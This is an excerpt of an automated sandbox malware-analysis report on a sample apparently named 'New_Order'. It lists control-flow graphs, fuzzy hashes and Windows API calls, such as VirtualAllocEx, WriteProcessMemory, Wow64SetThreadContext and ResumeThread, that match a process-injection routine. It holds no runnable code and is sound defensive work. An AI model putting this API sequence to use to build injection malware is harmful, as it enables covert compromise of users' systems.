                                                                                                control_flow_graph 906 df06dd4-df06e75 909 df06e77-df06e81 906->909 910 df06eae-df06ece 906->910 909->910 911 df06e83-df06e85 909->911 917 df06ed0-df06eda 910->917 918 df06f07-df06f36 910->918 912 df06e87-df06e91 911->912 913 df06ea8-df06eab 911->913 915 df06e93 912->915 916 df06e95-df06ea4 912->916 913->910 915->916 916->916 919 df06ea6 916->919 917->918 920 df06edc-df06ede 917->920 926 df06f38-df06f42 918->926 927 df06f6f-df07029 CreateProcessA 918->927 919->913 921 df06ee0-df06eea 920->921 922 df06f01-df06f04 920->922 924 df06eec 921->924 925 df06eee-df06efd 921->925 922->918 924->925 925->925 928 df06eff 925->928 926->927 929 df06f44-df06f46 926->929 938 df07032-df070b8 927->938 939 df0702b-df07031 927->939 928->922 931 df06f48-df06f52 929->931 932 df06f69-df06f6c 929->932 933 df06f54 931->933 934 df06f56-df06f65 931->934 932->927 933->934 934->934 936 df06f67 934->936 936->932 949 df070c8-df070cc 938->949 950 df070ba-df070be 938->950 939->938 952 df070dc-df070e0 949->952 953 df070ce-df070d2 949->953 950->949 951 df070c0 950->951 951->949 954 df070f0-df070f4 952->954 955 df070e2-df070e6 952->955 953->952 956 df070d4 953->956 958 df07106-df0710d 954->958 959 df070f6-df070fc 954->959 955->954 957 df070e8 955->957 956->952 957->954 960 df07124 958->960 961 df0710f-df0711e 958->961 959->958 963 df07125 960->963 961->960 963->963
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0DF07016
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 2bcfebe17d13ae968fe83d754cd66331b03e225874e2f70e42f72ccdb4a08ccc
                                                                                                • Instruction ID: 009eb4ee957a29522cede24d57a8c94abcc78e29e1483e8ec139b5a3d77ef4f2
                                                                                                • Opcode Fuzzy Hash: 2bcfebe17d13ae968fe83d754cd66331b03e225874e2f70e42f72ccdb4a08ccc
                                                                                                • Instruction Fuzzy Hash: 24A16B71D002599FEF24DF68C841BEDBBB2BF48310F1485A9E809E7280DB75A985DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06838 Relevance: 1.8, APIs: 1, Instructions: 252memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 964 df06838-df06867 965 df0686d-df06883 964->965 966 df0690e-df06910 964->966 967 df06889-df06891 965->967 968 df06a7d-df06b13 VirtualAllocEx 965->968 969 df06912-df0691a 966->969 970 df0695c-df0695f 966->970 967->968 971 df06897-df068a7 967->971 994 df06b15-df06b1b 968->994 995 df06b1c-df06b41 968->995 972 df06928-df0694e 969->972 973 df0691c-df0691e 969->973 974 df06a75-df06a7c 970->974 975 df06965-df0697b 970->975 971->968 976 df068ad-df068ba 971->976 972->968 991 df06954-df06957 972->991 973->972 975->968 978 df06981-df06989 975->978 976->968 980 df068c0-df068d7 976->980 978->968 979 df0698f-df0699c 978->979 979->968 982 df069a2-df069b2 979->982 983 df068d9-df068dc 980->983 984 df068de 980->984 982->968 986 df069b8-df069d5 982->986 987 df068e0-df06909 983->987 984->987 986->968 989 df069db-df069e3 986->989 987->974 989->968 992 df069e9-df069f9 989->992 991->974 992->968 996 df069ff-df06a0c 992->996 994->995 996->968 998 df06a0e-df06a25 996->998 1001 df06a27 998->1001 1002 df06a2a-df06a68 998->1002 1001->1002 1010 df06a6a 1002->1010 1011 df06a6d 1002->1011 1010->1011 1011->974
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0DF06B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 35a914f85eeab1b0b463391c806d221b84a4afe5ea34f3f7ccef58bcee994aab
                                                                                                • Instruction ID: 92ea1bdad74985b7915a800da110fa093816e6b67a8cacdc538c8ac7402fea43
                                                                                                • Opcode Fuzzy Hash: 35a914f85eeab1b0b463391c806d221b84a4afe5ea34f3f7ccef58bcee994aab
                                                                                                • Instruction Fuzzy Hash: 8791BB70A105259BCB15DF2DC88067AFBF6EF89310B28C659D829DB299C734EC61DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06DE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1012 df06de0-df06e75 1014 df06e77-df06e81 1012->1014 1015 df06eae-df06ece 1012->1015 1014->1015 1016 df06e83-df06e85 1014->1016 1022 df06ed0-df06eda 1015->1022 1023 df06f07-df06f36 1015->1023 1017 df06e87-df06e91 1016->1017 1018 df06ea8-df06eab 1016->1018 1020 df06e93 1017->1020 1021 df06e95-df06ea4 1017->1021 1018->1015 1020->1021 1021->1021 1024 df06ea6 1021->1024 1022->1023 1025 df06edc-df06ede 1022->1025 1031 df06f38-df06f42 1023->1031 1032 df06f6f-df07029 CreateProcessA 1023->1032 1024->1018 1026 df06ee0-df06eea 1025->1026 1027 df06f01-df06f04 1025->1027 1029 df06eec 1026->1029 1030 df06eee-df06efd 1026->1030 1027->1023 1029->1030 1030->1030 1033 df06eff 1030->1033 1031->1032 1034 df06f44-df06f46 1031->1034 1043 df07032-df070b8 1032->1043 1044 df0702b-df07031 1032->1044 1033->1027 1036 df06f48-df06f52 1034->1036 1037 df06f69-df06f6c 1034->1037 1038 df06f54 1036->1038 1039 df06f56-df06f65 1036->1039 1037->1032 1038->1039 1039->1039 1041 df06f67 1039->1041 1041->1037 1054 df070c8-df070cc 1043->1054 1055 df070ba-df070be 1043->1055 1044->1043 1057 df070dc-df070e0 1054->1057 1058 df070ce-df070d2 1054->1058 1055->1054 1056 df070c0 1055->1056 1056->1054 1059 df070f0-df070f4 1057->1059 1060 df070e2-df070e6 1057->1060 1058->1057 1061 df070d4 1058->1061 1063 df07106-df0710d 1059->1063 1064 df070f6-df070fc 1059->1064 1060->1059 1062 df070e8 1060->1062 1061->1057 1062->1059 1065 df07124 1063->1065 1066 df0710f-df0711e 1063->1066 1064->1063 1068 df07125 1065->1068 1066->1065 1068->1068
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0DF07016
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 4880e43859bfcc75aa83e505e55ffc19d955a7181c3e1268c52e7f5bf52e9d4c
                                                                                                • Instruction ID: 51c839617abc90096866a57c3166e9059c823129f7e104d0a3827f8e63163465
                                                                                                • Opcode Fuzzy Hash: 4880e43859bfcc75aa83e505e55ffc19d955a7181c3e1268c52e7f5bf52e9d4c
                                                                                                • Instruction Fuzzy Hash: 87914A71D002598FEF24DF68C841BEDBBB2BF48310F1485A9E809E7280DB75A995DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EE590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1069 ee590c-ee598c 1071 ee598f-ee59d9 CreateActCtxA 1069->1071 1073 ee59db-ee59e1 1071->1073 1074 ee59e2-ee5a3c 1071->1074 1073->1074 1081 ee5a3e-ee5a41 1074->1081 1082 ee5a4b-ee5a4f 1074->1082 1081->1082 1083 ee5a60 1082->1083 1084 ee5a51-ee5a5d 1082->1084 1086 ee5a61 1083->1086 1084->1083 1086->1086
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 2504875ed51937b54ecbab39bb690d54c2f21878f3c8fc7783b3efb9a136ee5b
                                                                                                • Instruction ID: 6108e16fc1fc099cd96e8107c61af95f9b324c1582a62aa8bf4f43dfba05d6b5
                                                                                                • Opcode Fuzzy Hash: 2504875ed51937b54ecbab39bb690d54c2f21878f3c8fc7783b3efb9a136ee5b
                                                                                                • Instruction Fuzzy Hash: 6F41D3B1C0075DCEDB24DFAAC885ADDBBB1BF44304F24816AD418BB251DB756946CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EE5A84 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1087 ee5a84-ee5b14
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 842542e51d93f2c9228f4e23b035777314921b79f519ea360338857633974d5e
                                                                                                • Instruction ID: f7a2dfa8594daf7a53420d15357a651b5a56fcfa8edde97e0713ce7ccf36e6b5
                                                                                                • Opcode Fuzzy Hash: 842542e51d93f2c9228f4e23b035777314921b79f519ea360338857633974d5e
                                                                                                • Instruction Fuzzy Hash: 4931E0B2C04A8CCFDB20CBA9C8857EDBBF0EF51318F24915AC059AB251D776A906CF01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EE4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1090 ee4248-ee59d9 CreateActCtxA 1094 ee59db-ee59e1 1090->1094 1095 ee59e2-ee5a3c 1090->1095 1094->1095 1102 ee5a3e-ee5a41 1095->1102 1103 ee5a4b-ee5a4f 1095->1103 1102->1103 1104 ee5a60 1103->1104 1105 ee5a51-ee5a5d 1103->1105 1107 ee5a61 1104->1107 1105->1104 1107->1107
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: de1dd51468d9d9f5bb6b377effccfd19eb909cb146d66869103757beef0addc1
                                                                                                • Instruction ID: 34d49131eb415bacb270779f70a667dafcece381741c7912b94e2a6fed6b5e9c
                                                                                                • Opcode Fuzzy Hash: de1dd51468d9d9f5bb6b377effccfd19eb909cb146d66869103757beef0addc1
                                                                                                • Instruction Fuzzy Hash: 8E41E1B1C0075DCBDB24DFAAC884ACDBBB5BF48308F24816AD408AB251DB756946CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06B51 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1108 df06b51-df06ba6 1110 df06bb6-df06bf5 WriteProcessMemory 1108->1110 1111 df06ba8-df06bb4 1108->1111 1113 df06bf7-df06bfd 1110->1113 1114 df06bfe-df06c2e 1110->1114 1111->1110 1113->1114
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0DF06BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 64870f8df9177a5f24662add3338b571fdf0318a22ba83ac9a15bf294e6680a2
                                                                                                • Instruction ID: 628fb9e6e6a9d78120ce214409ebfc133d4e6b88adfae40925dd9452fbb53b2a
                                                                                                • Opcode Fuzzy Hash: 64870f8df9177a5f24662add3338b571fdf0318a22ba83ac9a15bf294e6680a2
                                                                                                • Instruction Fuzzy Hash: F02148B59002499FDB10CFA9C885BEEBFF5FF48320F148429E518A7250D7799951DB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06C41 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0DF06CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: e8bb069b72c406a77eca34d99283b91eab68e88eaeed7a4d4f53c7457a03dab2
                                                                                                • Instruction ID: cada1b8e7f81a2b18e11e7f7e7076d10f78f422faf10874a6dee015657c75961
                                                                                                • Opcode Fuzzy Hash: e8bb069b72c406a77eca34d99283b91eab68e88eaeed7a4d4f53c7457a03dab2
                                                                                                • Instruction Fuzzy Hash: 822148B5C002499FDB10DFAAD845AEEBBF5FF48320F108429E518A7250D7799940DBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06B58 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0DF06BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 0f79c2976adcc6948af9228d35c067b0cc5ccfa2ced5d04b1f3890d6e379179d
                                                                                                • Instruction ID: ac1ecd9401a3ef3e183c5ed13952c46fabcdf54b88f4393b34f11e3ea4b5ffe4
                                                                                                • Opcode Fuzzy Hash: 0f79c2976adcc6948af9228d35c067b0cc5ccfa2ced5d04b1f3890d6e379179d
                                                                                                • Instruction Fuzzy Hash: 692157B19003499FDB10CFA9C880BEEBFF5FF48320F108429E918A7250D7799950DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06759 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0DF067DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: c7898c39496e359274983511bb63c1b6af842d047dae773e10215787fb39ff98
                                                                                                • Instruction ID: 72464fa89ba678e9bbb1018b167ea66f13cd53d52ecc63a6c3c4c8a60dd366bc
                                                                                                • Opcode Fuzzy Hash: c7898c39496e359274983511bb63c1b6af842d047dae773e10215787fb39ff98
                                                                                                • Instruction Fuzzy Hash: CD2148759002099FDB10DFAAC885BEEBBF4EF48324F148429E419A7241DB789945CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EED2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EED2C6,?,?,?,?,?), ref: 00EED387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: d6558ee8da015707dbf4eb105cb2717d324e778629e14043b32a1c0c7411af30
                                                                                                • Instruction ID: ce14bb96068197eb76572b1913466266033a9aa502a2c429db210a0bdc8ee9cd
                                                                                                • Opcode Fuzzy Hash: d6558ee8da015707dbf4eb105cb2717d324e778629e14043b32a1c0c7411af30
                                                                                                • Instruction Fuzzy Hash: A421E4B5910248DFDB10CFAAD985ADEBFF5FB48320F14841AE918A7350C379A951CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EEC9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EED2C6,?,?,?,?,?), ref: 00EED387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: ad767117f8efe4bd15902fdc68fa59fb5fdd78e6056ad8003bdc08ab5e35307f
                                                                                                • Instruction ID: 43a32b521881ae42da4aaf4146a8d9c3de1a8a387182abb0ddd82ba4e3ad78c8
                                                                                                • Opcode Fuzzy Hash: ad767117f8efe4bd15902fdc68fa59fb5fdd78e6056ad8003bdc08ab5e35307f
                                                                                                • Instruction Fuzzy Hash: B621E5B5900248DFDB10CF9AD984ADEBFF5EB48320F14841AE914B7350D375A950CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06C48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0DF06CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: b5f24c82afaf5beeeb30953bb7cee5c1213f6e02dc1d6af9d112a3713f3610f0
                                                                                                • Instruction ID: 568baeafed7e6e05eab9f2e1686f00957a88f5076061f49686f8de0d35038681
                                                                                                • Opcode Fuzzy Hash: b5f24c82afaf5beeeb30953bb7cee5c1213f6e02dc1d6af9d112a3713f3610f0
                                                                                                • Instruction Fuzzy Hash: 272139B1D003599FDB10DFAAC844AEEFBF5FF48320F508429E518A7250C7799911DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06760 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0DF067DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: e542281b9812253ab7dea073482e32c9fc1877cd0be9fcb1c0513c0494ef9257
                                                                                                • Instruction ID: e04e023184e7747a924e186d2fd87b55723cd503379fa381a15a5f021403a666
                                                                                                • Opcode Fuzzy Hash: e542281b9812253ab7dea073482e32c9fc1877cd0be9fcb1c0513c0494ef9257
                                                                                                • Instruction Fuzzy Hash: F5213571D002098FDB10DFAAC485BAEBFF4EF88324F14C42AD419A7280DB789945CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06A90 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0DF06B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: e4d66d67cab29a3554fe6a187b19ce26da4ed9bb4dc5d906ea40650f16b17feb
                                                                                                • Instruction ID: eab9cbd6212edc8726ebac54750a225de447385b5e32ac07d35786f41419d7d2
                                                                                                • Opcode Fuzzy Hash: e4d66d67cab29a3554fe6a187b19ce26da4ed9bb4dc5d906ea40650f16b17feb
                                                                                                • Instruction Fuzzy Hash: C5116AB1D002499FDF10DFAAC845ADEBFF5EF48320F148819E519A7250C77A9950DFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EEB2A1 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EEB101,00000800,00000000,00000000), ref: 00EEB312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 8dd4cc43d997961ee879805c9fb7d695d88db0977c1930618685f8cd7aa8484f
                                                                                                • Instruction ID: 92515ab61947a35c23e5bba3961e80e79c9140b9365e1d95bd3fb9856648ad1f
                                                                                                • Opcode Fuzzy Hash: 8dd4cc43d997961ee879805c9fb7d695d88db0977c1930618685f8cd7aa8484f
                                                                                                • Instruction Fuzzy Hash: 381126B6C002498FDB10CFAAD845ADEFBF4EF88320F14842AD919B7210C375A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF066A9 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 71d92819fc1152e71665d4fe3b2741198797cb9aa5a61ed5af2d8a5dbf484592
                                                                                                • Instruction ID: 89243db34fceb01d4129cb4aa2b115ab89d2fabebeeb6d386d59d664503c3d8b
                                                                                                • Opcode Fuzzy Hash: 71d92819fc1152e71665d4fe3b2741198797cb9aa5a61ed5af2d8a5dbf484592
                                                                                                • Instruction Fuzzy Hash: F31149759002498FDB10DFAAD845BEEFFF8EF88324F148419D419A7240DB75A940CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EEA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EEB101,00000800,00000000,00000000), ref: 00EEB312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 7209124ce381323d977050ab92b49fd59689e9579e697cde09ed8b67042ab63e
                                                                                                • Instruction ID: 066c3ab72b749c8cd17fd6426a2ccc85a91bf6e496ad706cee540830fb07c7c3
                                                                                                • Opcode Fuzzy Hash: 7209124ce381323d977050ab92b49fd59689e9579e697cde09ed8b67042ab63e
                                                                                                • Instruction Fuzzy Hash: A711D3B69002499FDB10CF9AD444A9EFBF8EF88324F14842AD919B7210C3B5A945CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF066B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 2b2502f33380af5593b7ac3df5b216fae808d79200465f7ea5d845c6c14806c3
                                                                                                • Instruction ID: 7910ea0c13bf49d2df793adeea7ce00c5b4f1f30aa0a44c6c22ca17716b5f21a
                                                                                                • Opcode Fuzzy Hash: 2b2502f33380af5593b7ac3df5b216fae808d79200465f7ea5d845c6c14806c3
                                                                                                • Instruction Fuzzy Hash: 70113A71D002498FDB20DFAAD4457AEFFF8EF88324F148419D519A7240CB79A944CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF077B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0DF0944D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: 9c105a4abe5e4502523ae4fd5362d7275786811b16d8ee44fe372be4a108ffdb
                                                                                                • Instruction ID: 320e4dfdfec5dffbf1c9a86b12da14ce50a901567f46b8bdbe894511ad3f04e3
                                                                                                • Opcode Fuzzy Hash: 9c105a4abe5e4502523ae4fd5362d7275786811b16d8ee44fe372be4a108ffdb
